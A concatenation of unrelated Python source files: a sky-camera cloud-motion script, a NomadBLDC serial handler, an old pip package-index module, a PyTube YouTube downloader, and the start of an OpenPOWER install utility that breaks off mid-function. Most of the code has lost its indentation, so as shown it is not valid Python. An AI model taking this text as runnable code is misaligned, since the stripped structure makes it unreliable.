ax[iy,ix].set_xticks([]); ax[iy,ix].set_yticks([])
ax[iy+1,ix].set_xticks([]); ax[iy+1,ix].set_yticks([])
img=None
with open(pkl,'rb') as input:
img=pickle.load(input);
if img is None:
continue
ax[iy,ix].imshow(img.rgb);
ax[iy+1,ix].imshow(img.cm,vmax=2);
plt.tight_layout();
plt.show();
# fig.savefig(outpath+ymdhms); plt.close();
def motion(args):
camera,day=args
ymd=day[:8]
flist = sorted(glob.glob(inpath+camera.camID+'/'+ymd+'/'+camera.camID+'_'+day+'*jpg'))
if len(flist)<=0:
return None
q=deque();
for f in flist:
# print("Start preprocessing ", f[-23:])
img=cam.image(camera,f); ###img object contains four data fields: rgb, red, rbr, and cm
img.undistort(camera,rgb=True); ###undistortion
# print("Undistortion completed ", f[-23:])
if img.rgb is None:
continue
q.append(img)
if len(q)<=1:
continue
####len(q) is always 2 beyond this point
if (q[-1].time-q[-2].time).seconds>=MAX_INTERVAL:
q.popleft(); q.popleft();
continue;
r1=q[-2].rgb[...,0].astype(np.float32); r1[r1<=0]=np.nan
r2=q[-1].rgb[...,0].astype(np.float32); r2[r2<=0]=np.nan
err0 = r2-r1; err0-=np.nanmean(err0)
cam.cloud_mask(camera,q[-1],q[-2]); ###one-layer cloud masking
q[-1].dump_img(tmpfs+f[-18:-10]+'/'+f[-23:-4]+'.msk');
q.popleft();
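# motion() keeps a two-frame sliding window in a deque: append the new frame, process the pair
# (q[-2], q[-1]), then popleft so the window never grows beyond two frames; if the gap exceeds
# MAX_INTERVAL both frames are dropped and the window restarts. The pattern in isolation, with
# plain timestamps standing in for image objects (illustrative only):
def _example_pairwise_window(timestamps, max_interval=MAX_INTERVAL):
    from collections import deque
    q = deque(); pairs = []
    for t in timestamps:
        q.append(t)
        if len(q) <= 1:
            continue
        if q[-1] - q[-2] >= max_interval:
            q.popleft(); q.popleft()  #### gap too large: drop both and restart the window
            continue
        pairs.append((q[-2], q[-1]))
        q.popleft()
    return pairs
# _example_pairwise_window([0, 30, 60, 400, 430, 460]) -> [(0, 30), (30, 60), (430, 460)]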
if __name__ == "__main__":
cameras=[];
for camID in cameraIDs:
cameras += [cam.camera(camID,max_theta=70,nx=1000,ny=1000)]
p0=multiprocessing.Process(target=visualize, args=(cameraIDs, days,))
p0.start();
# p = multiprocessing.Pool(len(cameraIDs))
# for day in days:
# if not os.path.isdir(tmpfs+day[:8]):
# try:
# subprocess.call(['mkdir', tmpfs+day[:8]])
# except:
# print('Cannot create directory,',tmpfs+day[:8])
# continue
# args=[[camera,day] for camera in cameras]
#
# p.map(motion,args)
p0.join();
|
SerialHandler.py
|
"""Serial Handler for Interaction with NomadBLDC Board"""
# SerialHandler.py
#
# Created on: March 20, 2020
# Author: Quincy Jones
#
# Copyright (c) <2020> <Quincy Jones - quincy@implementedrobotics.com/>
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the Software
# is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys
import glob
import serial
import time
import random
import threading
from HDLCHandler import HDLCHandler
from LogPrint import LogPrint as logger
#Serial Handler Interface
class SerialHandler:
def __init__(self, port, baud, packet_cb=None):
self.port = port # Port
self.baud = baud # Baud Rate
self.connected = False # Connected Flag
self.uart = serial.Serial(port, baudrate=baud, timeout=1) # Serial Port
self.hdlc = HDLCHandler(packet_cb) # HDLC Framing handler
self.close_event = threading.Event()
self.start_read_task() # Threaded Read Task
def close(self):
# Close Port
self.close_event.set()
self.uart.close()
def send_packet(self, packet):
hdlc_frame = self.hdlc.frame_packet(packet)
self.uart.write(hdlc_frame)
def start_read_task(self):
def recv_packet():
while(not self.close_event.is_set()):
if (self.uart.inWaiting() > 0): # Got Serial Data
byte = self.uart.read(1)
self.hdlc.process_byte(byte) # Send to HDLC to process packet
logger.print_info("Serial Receive Thread Terminated")
t = threading.Thread(target=recv_packet)
t.daemon = True
t.start()
@staticmethod
def get_available_ports():
""" Lists serial port names
:raises EnvironmentError:
On unsupported or unknown platforms
:returns:
A list of the serial ports available on the system
"""
if sys.platform.startswith('win'): # WINDOWS
ports = ['COM%s' % (i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'): #LINUX
# this excludes your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'): #MAC
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
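# A minimal usage sketch for the handler above (illustrative only: the baud rate and payload are
# placeholders, the packet callback is assumed to take the decoded packet as its single argument,
# and a real NomadBLDC board must be attached for this to do anything useful):
def _example_open_first_port(baud=115200):
    ports = SerialHandler.get_available_ports()
    if not ports:
        logger.print_info("No serial ports found")
        return None
    handler = SerialHandler(ports[0], baud, packet_cb=lambda packet: print(packet))
    handler.send_packet(b'\x01\x02\x03')  # placeholder payload; HDLCHandler adds the framing
    return handler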
|
index.py
|
"""Routines related to PyPI, indexes"""
import sys
import os
import re
import gzip
import mimetypes
try:
import threading
except ImportError:
import dummy_threading as threading
import posixpath
import pkg_resources
import random
import socket
import string
import zlib
from pip.log import logger
from pip.util import Inf
from pip.util import normalize_name, splitext
from pip.exceptions import DistributionNotFound, BestVersionAlreadyInstalled
from pip.backwardcompat import (WindowsError, BytesIO,
Queue, httplib, urlparse,
URLError, HTTPError, u,
product, url2pathname)
from pip.backwardcompat import Empty as QueueEmpty
from pip.download import urlopen, path_to_url2, url_to_path, geturl, Urllib2HeadRequest
__all__ = ['PackageFinder']
DEFAULT_MIRROR_URL = "last.pypi.python.org"
class PackageFinder(object):
"""This finds packages.
This is meant to match easy_install's technique for looking for
packages, by reading pages and looking for appropriate links
"""
def __init__(self, find_links, index_urls,
use_mirrors=False, mirrors=None, main_mirror_url=None):
self.find_links = find_links
self.index_urls = index_urls
self.dependency_links = []
self.cache = PageCache()
# These are boring links that have already been logged somehow:
self.logged_links = set()
if use_mirrors:
self.mirror_urls = self._get_mirror_urls(mirrors, main_mirror_url)
logger.info('Using PyPI mirrors: %s' % ', '.join(self.mirror_urls))
else:
self.mirror_urls = []
def add_dependency_links(self, links):
## FIXME: this shouldn't be a global list; it should only
## apply to requirements of the package that specifies the
## dependency_links value
## FIXME: also, we should track comes_from (i.e., use Link)
self.dependency_links.extend(links)
@staticmethod
def _sort_locations(locations):
"""
Sort locations into "files" (archives) and "urls", and return
a pair of lists (files,urls)
"""
files = []
urls = []
# puts the url for the given file path into the appropriate
# list
def sort_path(path):
url = path_to_url2(path)
if mimetypes.guess_type(url, strict=False)[0] == 'text/html':
urls.append(url)
else:
files.append(url)
for url in locations:
if url.startswith('file:'):
path = url_to_path(url)
if os.path.isdir(path):
path = os.path.realpath(path)
for item in os.listdir(path):
sort_path(os.path.join(path, item))
elif os.path.isfile(path):
sort_path(path)
else:
urls.append(url)
return files, urls
def make_pypi_url(self, url, url_name):
loc = posixpath.join(url, url_name)
# For maximum compatibility with easy_install, ensure the path
# ends in a trailing slash. Although this isn't in the spec
# (and PyPI can handle it without the slash) some other index
# implementations might break if they relied on easy_install's behavior.
if not loc.endswith('/'):
loc = loc + '/'
return loc
def find_requirement(self, req, upgrade):
url_name = req.url_name
# Only check main index if index URL is given:
main_index_url = None
if self.index_urls:
# Check that we have the url_name correctly spelled:
main_index_url = Link(self.make_pypi_url(self.index_urls[0], url_name))
# This will also cache the page, so it's okay that we get it again later:
page = self._get_page(main_index_url, req)
if page is None:
url_name = self._find_url_name(Link(self.index_urls[0]), url_name, req) or req.url_name
# Combine index URLs with mirror URLs here to allow
# adding more index URLs from requirements files
all_index_urls = self.index_urls + self.mirror_urls
if url_name is not None:
locations = [
self.make_pypi_url(url, url_name)
for url in all_index_urls] + self.find_links
else:
locations = list(self.find_links)
locations.extend(self.dependency_links)
for version in req.absolute_versions:
if url_name is not None and main_index_url is not None:
locations = [
posixpath.join(main_index_url.url, version, '/')] + locations
file_locations, url_locations = self._sort_locations(locations)
locations = [Link(url) for url in url_locations]
logger.debug('URLs to search for versions for %s:' % req)
for location in locations:
logger.debug('* %s' % location)
found_versions = []
found_versions.extend(
self._package_versions(
[Link(url, '-f') for url in self.find_links], req.name.lower()))
page_versions = []
for page in self._get_pages(locations, req):
logger.debug('Analyzing links from page %s' % page.url)
logger.indent += 2
try:
page_versions.extend(self._package_versions(page.links, req.name.lower()))
finally:
logger.indent -= 2
dependency_versions = list(self._package_versions(
[Link(url) for url in self.dependency_links], req.name.lower()))
if dependency_versions:
logger.info('dependency_links found: %s' % ', '.join([link.url for parsed, link, version in dependency_versions]))
file_versions = list(self._package_versions(
[Link(url) for url in file_locations], req.name.lower()))
if not found_versions and not page_versions and not dependency_versions and not file_versions:
logger.fatal('Could not find any downloads that satisfy the requirement %s' % req)
raise DistributionNotFound('No distributions at all found for %s' % req)
if req.satisfied_by is not None:
found_versions.append((req.satisfied_by.parsed_version, Inf, req.satisfied_by.version))
if file_versions:
file_versions.sort(reverse=True)
logger.info('Local files found: %s' % ', '.join([url_to_path(link.url) for parsed, link, version in file_versions]))
found_versions = file_versions + found_versions
all_versions = found_versions + page_versions + dependency_versions
applicable_versions = []
for (parsed_version, link, version) in all_versions:
if version not in req.req:
logger.info("Ignoring link %s, version %s doesn't match %s"
% (link, version, ','.join([''.join(s) for s in req.req.specs])))
continue
applicable_versions.append((link, version))
applicable_versions = sorted(applicable_versions, key=lambda v: pkg_resources.parse_version(v[1]), reverse=True)
existing_applicable = bool([link for link, version in applicable_versions if link is Inf])
if not upgrade and existing_applicable:
if applicable_versions[0][1] is Inf:
logger.info('Existing installed version (%s) is most up-to-date and satisfies requirement'
% req.satisfied_by.version)
raise BestVersionAlreadyInstalled
else:
logger.info('Existing installed version (%s) satisfies requirement (most up-to-date version is %s)'
% (req.satisfied_by.version, applicable_versions[0][1]))
return None
if not applicable_versions:
logger.fatal('Could not find a version that satisfies the requirement %s (from versions: %s)'
% (req, ', '.join([version for parsed_version, link, version in found_versions])))
raise DistributionNotFound('No distributions matching the version for %s' % req)
if applicable_versions[0][0] is Inf:
# We have an existing version, and its the best version
logger.info('Installed version (%s) is most up-to-date (past versions: %s)'
% (req.satisfied_by.version, ', '.join([version for link, version in applicable_versions[1:]]) or 'none'))
raise BestVersionAlreadyInstalled
if len(applicable_versions) > 1:
logger.info('Using version %s (newest of versions: %s)' %
(applicable_versions[0][1], ', '.join([version for link, version in applicable_versions])))
return applicable_versions[0][0]
def _find_url_name(self, index_url, url_name, req):
"""Finds the true URL name of a package, when the given name isn't quite correct.
This is usually used to implement case-insensitivity."""
if not index_url.url.endswith('/'):
# Vaguely part of the PyPI API... weird but true.
## FIXME: bad to modify this?
index_url.url += '/'
page = self._get_page(index_url, req)
if page is None:
logger.fatal('Cannot fetch index base URL %s' % index_url)
return
norm_name = normalize_name(req.url_name)
for link in page.links:
base = posixpath.basename(link.path.rstrip('/'))
if norm_name == normalize_name(base):
logger.notify('Real name of requirement %s is %s' % (url_name, base))
return base
return None
def _get_pages(self, locations, req):
"""Yields (page, page_url) from the given locations, skipping
locations that have errors, and adding download/homepage links"""
pending_queue = Queue()
for location in locations:
pending_queue.put(location)
done = []
seen = set()
threads = []
for i in range(min(10, len(locations))):
t = threading.Thread(target=self._get_queued_page, args=(req, pending_queue, done, seen))
t.setDaemon(True)
threads.append(t)
t.start()
for t in threads:
t.join()
return done
_log_lock = threading.Lock()
def _get_queued_page(self, req, pending_queue, done, seen):
while 1:
try:
location = pending_queue.get(False)
except QueueEmpty:
return
if location in seen:
continue
seen.add(location)
page = self._get_page(location, req)
if page is None:
continue
done.append(page)
for link in page.rel_links():
pending_queue.put(link)
_egg_fragment_re = re.compile(r'#egg=([^&]*)')
_egg_info_re = re.compile(r'([a-z0-9_.]+)-([a-z0-9_.-]+)', re.I)
_py_version_re = re.compile(r'-py([123]\.?[0-9]?)$')
def _sort_links(self, links):
"Returns elements of links in order, non-egg links first, egg links second, while eliminating duplicates"
eggs, no_eggs = [], []
seen = set()
for link in links:
if link not in seen:
seen.add(link)
if link.egg_fragment:
eggs.append(link)
else:
no_eggs.append(link)
return no_eggs + eggs
def _package_versions(self, links, search_name):
for link in self._sort_links(links):
for v in self._link_package_versions(link, search_name):
yield v
def _link_package_versions(self, link, search_name):
"""
Return an iterable of triples (pkg_resources_version_key,
link, python_version) that can be extracted from the given
link.
Meant to be overridden by subclasses, not called by clients.
"""
if link.egg_fragment:
egg_info = link.egg_fragment
else:
egg_info, ext = link.splitext()
if not ext:
if link not in self.logged_links:
logger.debug('Skipping link %s; not a file' % link)
self.logged_links.add(link)
return []
if egg_info.endswith('.tar'):
# Special double-extension case:
egg_info = egg_info[:-4]
ext = '.tar' + ext
if ext not in ('.tar.gz', '.tar.bz2', '.tar', '.tgz', '.zip'):
if link not in self.logged_links:
logger.debug('Skipping link %s; unknown archive format: %s' % (link, ext))
self.logged_links.add(link)
return []
if "macosx10" in link.path and ext == '.zip':
if link not in self.logged_links:
logger.debug('Skipping link %s; macosx10 one' % (link))
self.logged_links.add(link)
return []
version = self._egg_info_matches(egg_info, search_name, link)
if version is None:
logger.debug('Skipping link %s; wrong project name (not %s)' % (link, search_name))
return []
match = self._py_version_re.search(version)
if match:
version = version[:match.start()]
py_version = match.group(1)
if py_version != sys.version[:3]:
logger.debug('Skipping %s because Python version is incorrect' % link)
return []
logger.debug('Found link %s, version: %s' % (link, version))
return [(pkg_resources.parse_version(version),
link,
version)]
def _egg_info_matches(self, egg_info, search_name, link):
match = self._egg_info_re.search(egg_info)
if not match:
logger.debug('Could not parse version from link: %s' % link)
return None
name = match.group(0).lower()
# To match the "safe" name that pkg_resources creates:
name = name.replace('_', '-')
# project name and version must be separated by a dash
look_for = search_name.lower() + "-"
if name.startswith(look_for):
return match.group(0)[len(look_for):]
else:
return None
def _get_page(self, link, req):
return HTMLPage.get_page(link, req, cache=self.cache)
def _get_mirror_urls(self, mirrors=None, main_mirror_url=None):
"""Retrieves a list of URLs from the main mirror DNS entry
unless a list of mirror URLs are passed.
"""
if not mirrors:
mirrors = get_mirrors(main_mirror_url)
# Should this be made "less random"? E.g. netselect like?
random.shuffle(mirrors)
mirror_urls = set()
for mirror_url in mirrors:
# Make sure we have a valid URL
if not ("http://" or "https://" or "file://") in mirror_url:
mirror_url = "http://%s" % mirror_url
if not mirror_url.endswith("/simple"):
mirror_url = "%s/simple/" % mirror_url
mirror_urls.add(mirror_url)
return list(mirror_urls)
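# _get_mirror_urls() normalizes bare mirror host names into full "/simple/" index URLs. The
# normalization rule in isolation, kept outside the class (illustrative only):
def _example_normalize_mirror(mirror_url):
    if not mirror_url.startswith(("http://", "https://", "file://")):
        mirror_url = "http://%s" % mirror_url
    if not mirror_url.endswith("/simple"):
        mirror_url = "%s/simple/" % mirror_url
    return mirror_url

# _example_normalize_mirror("b.pypi.python.org") -> "http://b.pypi.python.org/simple/"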
class PageCache(object):
"""Cache of HTML pages"""
failure_limit = 3
def __init__(self):
self._failures = {}
self._pages = {}
self._archives = {}
def too_many_failures(self, url):
return self._failures.get(url, 0) >= self.failure_limit
def get_page(self, url):
return self._pages.get(url)
def is_archive(self, url):
return self._archives.get(url, False)
def set_is_archive(self, url, value=True):
self._archives[url] = value
def add_page_failure(self, url, level):
self._failures[url] = self._failures.get(url, 0)+level
def add_page(self, urls, page):
for url in urls:
self._pages[url] = page
class HTMLPage(object):
"""Represents one page, along with its URL"""
## FIXME: these regexes are horrible hacks:
_homepage_re = re.compile(r'<th>\s*home\s*page', re.I)
_download_re = re.compile(r'<th>\s*download\s+url', re.I)
## These aren't so awful:
_rel_re = re.compile("""<[^>]*\srel\s*=\s*['"]?([^'">]+)[^>]*>""", re.I)
_href_re = re.compile('href=(?:"([^"]*)"|\'([^\']*)\'|([^>\\s\\n]*))', re.I|re.S)
_base_re = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I)
def __init__(self, content, url, headers=None):
self.content = content
self.url = url
self.headers = headers
def __str__(self):
return self.url
@classmethod
def get_page(cls, link, req, cache=None, skip_archives=True):
url = link.url
url = url.split('#', 1)[0]
if cache.too_many_failures(url):
return None
# Check for VCS schemes that do not support lookup as web pages.
from pip.vcs import VcsSupport
for scheme in VcsSupport.schemes:
if url.lower().startswith(scheme) and url[len(scheme)] in '+:':
logger.debug('Cannot look at %(scheme)s URL %(link)s' % locals())
return None
if cache is not None:
inst = cache.get_page(url)
if inst is not None:
return inst
try:
if skip_archives:
if cache is not None:
if cache.is_archive(url):
return None
filename = link.filename
for bad_ext in ['.tar', '.tar.gz', '.tar.bz2', '.tgz', '.zip']:
if filename.endswith(bad_ext):
content_type = cls._get_content_type(url)
if content_type.lower().startswith('text/html'):
break
else:
logger.debug('Skipping page %s because of Content-Type: %s' % (link, content_type))
if cache is not None:
cache.set_is_archive(url)
return None
logger.debug('Getting page %s' % url)
# Tack index.html onto file:// URLs that point to directories
(scheme, netloc, path, params, query, fragment) = urlparse.urlparse(url)
if scheme == 'file' and os.path.isdir(url2pathname(path)):
# add trailing slash if not present so urljoin doesn't trim final segment
if not url.endswith('/'):
url += '/'
url = urlparse.urljoin(url, 'index.html')
logger.debug(' file: URL is directory, getting %s' % url)
resp = urlopen(url)
real_url = geturl(resp)
headers = resp.info()
contents = resp.read()
encoding = headers.get('Content-Encoding', None)
#XXX need to handle exceptions and add testing for this
if encoding is not None:
if encoding == 'gzip':
contents = gzip.GzipFile(fileobj=BytesIO(contents)).read()
if encoding == 'deflate':
contents = zlib.decompress(contents)
inst = cls(u(contents), real_url, headers)
except (HTTPError, URLError, socket.timeout, socket.error, OSError, WindowsError):
e = sys.exc_info()[1]
desc = str(e)
if isinstance(e, socket.timeout):
log_meth = logger.info
level = 1
desc = 'timed out'
elif isinstance(e, URLError):
log_meth = logger.info
if hasattr(e, 'reason') and isinstance(e.reason, socket.timeout):
desc = 'timed out'
level = 1
else:
level = 2
elif isinstance(e, HTTPError) and e.code == 404:
## FIXME: notify?
log_meth = logger.info
level = 2
else:
log_meth = logger.info
level = 1
log_meth('Could not fetch URL %s: %s' % (link, desc))
log_meth('Will skip URL %s when looking for download links for %s' % (link.url, req))
if cache is not None:
cache.add_page_failure(url, level)
return None
if cache is not None:
cache.add_page([url, real_url], inst)
return inst
@staticmethod
def _get_content_type(url):
"""Get the Content-Type of the given url, using a HEAD request"""
scheme, netloc, path, query, fragment = urlparse.urlsplit(url)
if not scheme in ('http', 'https', 'ftp', 'ftps'):
## FIXME: some warning or something?
## assertion error?
return ''
req = Urllib2HeadRequest(url, headers={'Host': netloc})
resp = urlopen(req)
try:
if hasattr(resp, 'code') and resp.code != 200 and scheme not in ('ftp', 'ftps'):
## FIXME: doesn't handle redirects
return ''
return resp.info().get('content-type', '')
finally:
resp.close()
@property
def base_url(self):
if not hasattr(self, "_base_url"):
match = self._base_re.search(self.content)
if match:
self._base_url = match.group(1)
else:
self._base_url = self.url
return self._base_url
@property
def links(self):
"""Yields all links in the page"""
for match in self._href_re.finditer(self.content):
url = match.group(1) or match.group(2) or match.group(3)
url = self.clean_link(urlparse.urljoin(self.base_url, url))
yield Link(url, self)
def rel_links(self):
for url in self.explicit_rel_links():
yield url
for url in self.scraped_rel_links():
yield url
def explicit_rel_links(self, rels=('homepage', 'download')):
"""Yields all links with the given relations"""
for match in self._rel_re.finditer(self.content):
found_rels = match.group(1).lower().split()
for rel in rels:
if rel in found_rels:
break
else:
continue
match = self._href_re.search(match.group(0))
if not match:
continue
url = match.group(1) or match.group(2) or match.group(3)
url = self.clean_link(urlparse.urljoin(self.base_url, url))
yield Link(url, self)
def scraped_rel_links(self):
for regex in (self._homepage_re, self._download_re):
match = regex.search(self.content)
if not match:
continue
href_match = self._href_re.search(self.content, pos=match.end())
if not href_match:
continue
url = href_match.group(1) or href_match.group(2) or href_match.group(3)
if not url:
continue
url = self.clean_link(urlparse.urljoin(self.base_url, url))
yield Link(url, self)
_clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I)
def clean_link(self, url):
"""Makes sure a link is fully encoded. That is, if a ' ' shows up in
the link, it will be rewritten to %20 (while not over-quoting
% or other characters)."""
return self._clean_re.sub(
lambda match: '%%%2x' % ord(match.group(0)), url)
class Link(object):
def __init__(self, url, comes_from=None):
self.url = url
self.comes_from = comes_from
def __str__(self):
if self.comes_from:
return '%s (from %s)' % (self.url, self.comes_from)
else:
return self.url
def __repr__(self):
return '<Link %s>' % self
def __eq__(self, other):
return self.url == other.url
def __hash__(self):
return hash(self.url)
@property
def filename(self):
_, netloc, path, _, _ = urlparse.urlsplit(self.url)
name = posixpath.basename(path.rstrip('/')) or netloc
assert name, ('URL %r produced no filename' % self.url)
return name
@property
def scheme(self):
return urlparse.urlsplit(self.url)[0]
@property
def path(self):
return urlparse.urlsplit(self.url)[2]
def splitext(self):
return splitext(posixpath.basename(self.path.rstrip('/')))
@property
def url_without_fragment(self):
scheme, netloc, path, query, fragment = urlparse.urlsplit(self.url)
return urlparse.urlunsplit((scheme, netloc, path, query, None))
_egg_fragment_re = re.compile(r'#egg=([^&]*)')
@property
def egg_fragment(self):
match = self._egg_fragment_re.search(self.url)
if not match:
return None
return match.group(1)
_md5_re = re.compile(r'md5=([a-f0-9]+)')
@property
def md5_hash(self):
match = self._md5_re.search(self.url)
if match:
return match.group(1)
return None
@property
def show_url(self):
return posixpath.basename(self.url.split('#', 1)[0].split('?', 1)[0])
def get_requirement_from_url(url):
"""Get a requirement from the URL, if possible. This looks for #egg
in the URL"""
link = Link(url)
egg_info = link.egg_fragment
if not egg_info:
egg_info = splitext(link.filename)[0]
return package_to_requirement(egg_info)
def package_to_requirement(package_name):
"""Translate a name like Foo-1.2 to Foo==1.3"""
match = re.search(r'^(.*?)-(dev|\d.*)', package_name)
if match:
name = match.group(1)
version = match.group(2)
else:
name = package_name
version = ''
if version:
return '%s==%s' % (name, version)
else:
return name
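# Worked example (illustrative, not part of the original module):
#   get_requirement_from_url('http://host/Foo-1.2.tar.gz#egg=Foo') -> 'Foo'
#   get_requirement_from_url('http://host/Foo-1.2.tar.gz')         -> 'Foo==1.2'
# The second case falls back to the filename, which package_to_requirement()
# splits into name 'Foo' and version '1.2'.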
def get_mirrors(hostname=None):
"""Return the list of mirrors from the last record found on the DNS
entry::
>>> from pip.index import get_mirrors
>>> get_mirrors()
['a.pypi.python.org', 'b.pypi.python.org', 'c.pypi.python.org',
'd.pypi.python.org']
Originally written for the distutils2 project by Alexis Metaireau.
"""
if hostname is None:
hostname = DEFAULT_MIRROR_URL
# return the last mirror registered on PyPI.
try:
hostname = socket.gethostbyname_ex(hostname)[0]
except socket.gaierror:
return []
end_letter = hostname.split(".", 1)
# determine the list from the last one.
return ["%s.%s" % (s, end_letter[1]) for s in string_range(end_letter[0])]
def string_range(last):
"""Compute the range of string between "a" and last.
This works for simple "a to z" lists, but also for "a to zz" lists.
"""
for k in range(len(last)):
for x in product(string.ascii_lowercase, repeat=k+1):
result = ''.join(x)
yield result
if result == last:
return
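# Example of the enumeration order (illustrative): list(string_range('c')) yields
# ['a', 'b', 'c'], while string_range('ab') walks 'a'..'z' first and then 'aa', 'ab';
# this is how mirror hostnames like a.pypi.python.org, b.pypi.python.org, ... are derived.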
|
YoutubeDownloader.py
|
from PyQt5.QtCore import *
from pytube import YouTube
from threading import Thread
import Core.OSHandler as OSHandler
import Core.FFmpegHandler as FFmpegHandler
class YoutubeDownloader(QObject):
class DownloadHandler(QObject):
progressSignal = pyqtSignal([int, int])
completeSignal = pyqtSignal()
def getProgressSignal(self):
return self.progressSignal
def progress(self, stream, chunk, bytes_remaining):
if stream == self.audioStream:
self.downloadedAudio = self.audioStream.filesize - bytes_remaining
elif stream == self.videoStream:
self.downloadedVideo = self.videoStream.filesize - bytes_remaining
downloaded = self.downloadedAudio + self.downloadedVideo
self.progressSignal.emit(downloaded, self.filesize)
def merge(self):
self.videoDownload.join()
self.audioDownload.join()
# merge via ffmpeg
FFmpegHandler.videoAudioMerge(str(QFileInfo('tmp/video.mp4').absoluteFilePath()),
str(QFileInfo('tmp/audio.mp4').absoluteFilePath()),
str(QFileInfo(self.filename).absoluteFilePath()))
print('done')
# delete tmp files
OSHandler.rmdir('tmp')
self.completeSignal.emit()
def __init__(self, filename, video):
super().__init__()
print('downloading {} ...'.format(filename))
self.filename = filename
self.video = video
self.video.register_on_progress_callback(self.progress)
self.audioStream = self.video.streams.get_audio_only()
self.videoStream = self.video.streams.filter(adaptive=True, file_extension="mp4").order_by('resolution').desc().first()
self.filesize = self.videoStream.filesize + self.audioStream.filesize
self.downloadedAudio = 0
self.downloadedVideo = 0
self.videoDownload = Thread(target=self.videoStream.download, args=('tmp', 'video'))
self.videoDownload.start()
self.audioDownload = Thread(target=self.audioStream.download, args=('tmp', 'audio'))
self.audioDownload.start()
self.mergeThread = Thread(target=self.merge)
self.mergeThread.start()
def __init__(self, parent=None):
super(QObject, self).__init__(parent)
def download(self, url, filename):
fileInfo = QFileInfo(filename)
dirPath = fileInfo.absolutePath()
fileBaseName = fileInfo.baseName()
video = YouTube(url)
dh = self.DownloadHandler(filename, video)
return dh.getProgressSignal()
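# Hypothetical usage (not part of this module): connect the returned signal to track progress, e.g.
#   yd = YoutubeDownloader()
#   yd.download('https://www.youtube.com/watch?v=...', 'out.mp4').connect(
#       lambda done, total: print(done, total))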
if __name__ == '__main__':
url = 'https://www.youtube.com/watch?v=d3D7Y_ycSms'
yd = YoutubeDownloader()
yd.download(url, '')
|
OpTestInstallUtil.py
|
#!/usr/bin/env python2
# OpenPOWER Automated Test Project
#
# Contributors Listed Below - COPYRIGHT 2018
# [+] International Business Machines Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
# OpTest Install Utils
#
import shutil
import urllib2
import os
import threading
import SocketServer
import BaseHTTPServer
import SimpleHTTPServer
import cgi
import commands
import time
from Exceptions import CommandFailed, UnexpectedCase
import OpTestConfiguration
from common.OpTestSystem import OpSystemState
import logging
import OpTestLogger
log = OpTestLogger.optest_logger_glob.get_logger(__name__)
BASE_PATH = ""
INITRD = ""
VMLINUX = ""
KS = ""
DISK = ""
USERNAME = ""
PASSWORD = ""
REPO = ""
BOOTPATH = ""
uploaded_files = {}
class InstallUtil():
def __init__(self, base_path="", initrd="", vmlinux="",
ks="", boot_path="", repo=""):
global BASE_PATH
global INITRD
global VMLINUX
global KS
global DISK
global USERNAME
global PASSWORD
global BOOTPATH
global REPO
global PROXY
self.conf = OpTestConfiguration.conf
self.cv_HOST = self.conf.host()
self.cv_SYSTEM = self.conf.system()
self.server = ""
self.repo = self.conf.args.os_repo
REPO = self.repo
DISK = self.cv_HOST.get_scratch_disk()
USERNAME = self.cv_HOST.username()
PASSWORD = self.cv_HOST.password()
BOOTPATH = boot_path
BASE_PATH = base_path
INITRD = initrd
VMLINUX = vmlinux
PROXY = self.cv_HOST.get_proxy()
KS = ks
def wait_for_network(self):
retry = 6
while retry > 0:
try:
self.cv_SYSTEM.console.run_command("ifconfig -a", retry=5)
return True
except CommandFailed as cf:
log.debug("wait_for_network CommandFailed={}".format(cf))
if cf.exitcode == 1:
time.sleep(5)
retry = retry - 1
pass
else:
log.debug("wait_for_network ELSE raise cf={}".format(cf))
raise cf
def ping_network(self):
retry = 6
while retry > 0:
try:
ip = self.conf.args.host_gateway
log.debug("ping_network ip={}".format(ip))
if ip in [None, ""]:
ip = self.cv_SYSTEM.get_my_ip_from_host_perspective()
log.debug("ping_network tried to get new ip={}".format(ip))
cmd = "ping %s -c 1" % ip
log.debug("ping_network retry=50, use this to gauge if network problems, "
" compare with run_command logging to help figure out whats wrong")
output = self.cv_SYSTEM.console.run_command(cmd, retry=50)
log.debug("ping_network output={}".format(output))
return True
except CommandFailed as cf:
log.debug("ping_network Exception={}".format(cf))
if retry == 1:
log.debug("ping_network raise cf={}".format(cf))
raise cf
if cf.exitcode == 1:
time.sleep(5)
retry = retry - 1
log.debug("ping_network Exception path, retry={}".format(retry))
pass
else:
log.debug("ping_network Exception path ELSE, raise cf={}".format(cf))
raise cf
def assign_ip_petitboot(self):
"""
Assign host ip in petitboot
"""
# Lets reduce timeout in petitboot
self.cv_SYSTEM.console.run_command("nvram --update-config petitboot,timeout=10", retry=5)
# this will not work without these
if not self.conf.args.host_mac \
or not self.conf.args.host_submask \
or not self.conf.args.host_gateway \
or not self.conf.args.host_dns:
my_msg = ("We need host_mac/host_submask/host_gateway/host_dns provided"
" on command line args or via configuration files.")
